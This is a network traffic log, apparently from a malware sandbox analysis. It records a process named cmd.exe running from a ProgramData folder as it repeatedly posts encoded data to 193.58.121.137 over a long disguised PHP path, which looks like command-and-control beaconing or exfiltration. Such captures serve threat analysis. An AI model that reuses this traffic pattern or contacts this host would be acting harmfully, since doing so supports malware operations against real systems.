Jan 3, 2025 20:48:46.939589024 CET	397	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2560 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 20:48:47.294778109 CET	2560	OUT	Data Raw: 5f 5e 5c 53 59 43 5f 50 5a 5c 55 51 59 59 54 53 56 5e 5d 45 50 5c 5a 5b 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: _^\SYC_PZ\UQYYTSV^]EP\Z[Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%F)33X$!&7%<Y+>?T(.V&..= /.274?S<-'_!%Y)
Jan 3, 2025 20:48:47.571274042 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:48:47.717634916 CET	207	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:48:47 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3b 56 5f 56 Data Ascii: ;V_V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.4	50083	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:48:47.845408916 CET	397	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2552 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 20:48:48.224891901 CET	2552	OUT	Data Raw: 5a 52 5c 59 5c 43 5f 52 5a 5c 55 51 59 5e 54 52 56 5a 5d 40 50 56 5a 58 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: ZR\Y\C_RZ\UQY^TRVZ]@PVZXZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%<03&=)%72<>=?T<6P%X%+[-C&#';U+-'_!%Y)#
Jan 3, 2025 20:48:48.470125914 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:48:48.601258039 CET	207	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:48:48 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3b 56 5f 56 Data Ascii: ;V_V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.4	50084	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:48:48.848701954 CET	397	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2560 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 20:48:49.201150894 CET	2560	OUT	Data Raw: 5f 50 5c 52 5c 40 5a 51 5a 5c 55 51 59 56 54 53 56 5c 5d 48 50 5c 5a 5f 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: _P\R\@ZQZ\UQYVTSV\]HP\Z_Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%+ 0$-&149X'<?,+'9%>%T*3_:7';S?'_!%Y)
Jan 3, 2025 20:48:49.538568974 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:48:49.668468952 CET	207	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:48:49 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3b 56 5f 56 Data Ascii: ;V_V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.4	50085	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:48:49.795551062 CET	397	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2560 Expect: 100-continue Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.4	50086	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:48:50.066179037 CET	397	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 1884 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 20:48:50.419826984 CET	1884	OUT	Data Raw: 5f 56 59 58 5c 47 5f 57 5a 5c 55 51 59 5d 54 56 56 50 5d 43 50 51 5a 5e 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: _VYX\G_WZ\UQY]TVVP]CPQZ^Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%+33^3.)1%2<Y<$(6V&*$-%)743V<='_!%Y)+
Jan 3, 2025 20:48:50.695255041 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:48:50.824423075 CET	380	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:48:50 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 09 1e 26 11 25 26 20 19 27 38 3f 55 33 3a 36 52 28 3c 09 06 2e 22 3f 00 22 03 20 0a 3d 0a 38 5c 3d 01 3c 5c 21 2f 31 0c 22 3f 3d 12 3f 2a 23 5b 03 1d 22 13 22 21 32 5b 31 39 2d 5b 3b 1e 33 1a 32 13 39 1d 3c 00 31 50 34 07 36 55 35 00 3b 0c 38 30 26 01 30 02 30 02 3c 3d 08 59 33 2f 21 51 00 10 39 1d 27 0d 36 04 27 3c 07 01 26 3d 21 58 30 35 38 07 22 2f 26 1b 25 3b 25 5b 2f 32 06 1e 25 0c 23 0e 35 30 37 07 29 5f 29 50 25 11 22 5f 2a 01 20 52 00 31 5c 51 Data Ascii: &%& '8?U3:6R(<."?" =8\=<\!/1"?=?#[""!2[19-[;329<1P46U5;80&00<=Y3/!Q9'6'<&=!X058"/&%;%[/2%#507)_)P%"_ R1\Q

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.4	50087	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:48:50.186923981 CET	397	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2552 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 20:48:50.544574976 CET	2552	OUT	Data Raw: 5a 56 5c 5f 59 42 5f 51 5a 5c 55 51 59 5e 54 50 56 51 5d 49 50 50 5a 52 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: ZV\_YB_QZ\UQY^TPVQ]IPPZRZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%F(/'9Z%761[?-8(B&U2>)=3Y,5! 4/R?'_!%Y)+
Jan 3, 2025 20:48:50.814026117 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:48:50.945132017 CET	207	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:48:50 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3b 56 5f 56 Data Ascii: ;V_V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.4	50088	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:48:51.913532019 CET	373	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2560 Expect: 100-continue
Jan 3, 2025 20:48:52.263398886 CET	2560	OUT	Data Raw: 5f 55 5c 5c 5c 46 5f 52 5a 5c 55 51 59 56 54 52 56 5d 5d 43 50 55 5a 5a 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: _U\\\F_RZ\UQYVTRV]]CPUZZZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%+33^&>1&!X&?4](=;T('%&)4:5 <'_!%Y)
Jan 3, 2025 20:48:52.611696959 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:48:52.756004095 CET	151	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:48:52 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 3b 56 5f 56 Data Ascii: ;V_V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.4	50089	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:48:52.880959034 CET	397	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2560 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 20:48:53.232491970 CET	2560	OUT	Data Raw: 5a 51 5c 5a 5c 47 5a 56 5a 5c 55 51 59 59 54 50 56 5f 5d 45 50 55 5a 5b 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: ZQ\Z\GZVZ\UQYYTPV_]EPUZ[Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[&+3,01Y'76&<Y+<?&Q$=&)U?X-743<='_!%Y)
Jan 3, 2025 20:48:53.503725052 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:48:53.636322975 CET	207	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:48:53 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3b 56 5f 56 Data Ascii: ;V_V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.4	50090	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:48:53.772481918 CET	397	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2560 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 20:48:54.126055956 CET	2560	OUT	Data Raw: 5a 56 5c 5a 59 45 5f 51 5a 5c 55 51 59 5b 54 5a 56 5f 5d 44 50 57 5a 5c 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: ZV\ZYE_QZ\UQY[TZV_]DPWZ\Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%)#;'6%Q"&/3?.;V+'!2&(3?_:*7'3<'_!%Y)3
Jan 3, 2025 20:48:54.435530901 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:48:54.582725048 CET	207	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:48:54 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3b 56 5f 56 Data Ascii: ;V_V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.4	50091	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:48:55.016572952 CET	397	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2560 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 20:48:55.373459101 CET	2560	OUT	Data Raw: 5a 56 59 58 5c 41 5a 54 5a 5c 55 51 59 5a 54 54 56 5b 5d 43 50 57 5a 59 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: ZVYX\AZTZ\UQYZTTV[]CPWZYZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%) ']'==21Z([+-($W1=>=#7^-%:"'<?'_!%Y)7
Jan 3, 2025 20:48:55.722199917 CET	25	IN	HTTP/1.1 100 Continue

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.4	50092	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:48:55.832612038 CET	397	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 1884 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 20:48:56.185509920 CET	1884	OUT	Data Raw: 5f 5f 5c 5d 5c 43 5a 56 5a 5c 55 51 59 58 54 55 56 5b 5d 44 50 50 5a 5f 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: __\]\CZVZ\UQYXTUV[]DPPZ_Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%G+0<$=:%9X1Z#(P)426=0,-6%Y Q0('_!%Y)?
Jan 3, 2025 20:48:56.489723921 CET	405	IN	HTTP/1.1 100 Continue Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 30 33 20 4a 61 6e 20 32 30 32 35 20 31 39 3a 34 38 3a 35 36 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 35 32 0d 0a 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 35 2c 20 6d 61 78 3d 31 30 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 0d 0a 09 1e 26 11 24 35 38 56 24 06 3c 09 25 2a 2d 0e 2b 5a 3f 43 2c 32 27 03 36 3a 09 55 2a 33 24 5b 3e 2f 33 02 22 3f 29 09 36 06 22 00 2a 3a 23 5b 03 1d 21 01 20 31 2e 13 25 29 31 10 2c 0e 2b 1c 31 3e 26 07 28 2d 36 0e 23 3d 3a 53 36 3e 1d 0f 2c 23 07 5a 30 02 23 10 2b 3d 08 1e 24 15 21 51 00 10 39 12 24 1d 3d 5c 25 3f 39 07 25 5b [TRUNCATED] Data Ascii: HTTP/1.1 200 OKDate: Fri, 03 Jan 2025 19:48:56 GMTServer: Apache/2.4.41 (Ubuntu)Vary: Accept-EncodingContent-Length: 152Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=UTF-8&$58V$<%-+Z?C,2'6:U3$[>/3"?)6":#[! 1.%)1,+1>&(-6#=:S6>,#Z0#+=$!Q9$=\%?9%[)0%'!%(!,1 T%2<53>62"_ R1\Q

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.4	50093	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:48:55.959898949 CET	397	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2560 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 20:48:56.311072111 CET	2560	OUT	Data Raw: 5a 52 59 5a 59 47 5a 56 5a 5c 55 51 59 5f 54 51 56 51 5d 40 50 56 5a 59 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: ZRYZYGZVZ\UQY_TQVQ]@PVZYZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[&)0'>=Y&Q%?<+>#T(>P&!WX9> $;T?'_!%Y)#
Jan 3, 2025 20:48:56.598861933 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:48:56.726963043 CET	207	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:48:56 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3b 56 5f 56 Data Ascii: ;V_V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.4	50094	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:48:56.861624002 CET	373	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2560 Expect: 100-continue
Jan 3, 2025 20:48:57.217320919 CET	2560	OUT	Data Raw: 5f 56 59 5f 5c 41 5a 5b 5a 5c 55 51 59 56 54 51 56 5d 5d 44 50 55 5a 5b 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: _VY_\AZ[Z\UQYVTQV]]DPUZ[Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%F?3$&-=]%4=[%/4<7Q('%1R)#.%: <-'_!%Y)
Jan 3, 2025 20:48:57.530221939 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:48:57.666150093 CET	151	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:48:57 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 3b 56 5f 56 Data Ascii: ;V_V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.4	50095	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:48:57.950536013 CET	397	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2560 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 20:48:58.295054913 CET	2560	OUT	Data Raw: 5a 51 5c 5b 59 45 5a 55 5a 5c 55 51 59 56 54 50 56 5e 5d 40 50 51 5a 53 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: ZQ\[YEZUZ\UQYVTPV^]@PQZSZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%A(3#]$.2%!1<'+-+*V$-)(#4-5Y4Q )-'_!%Y)
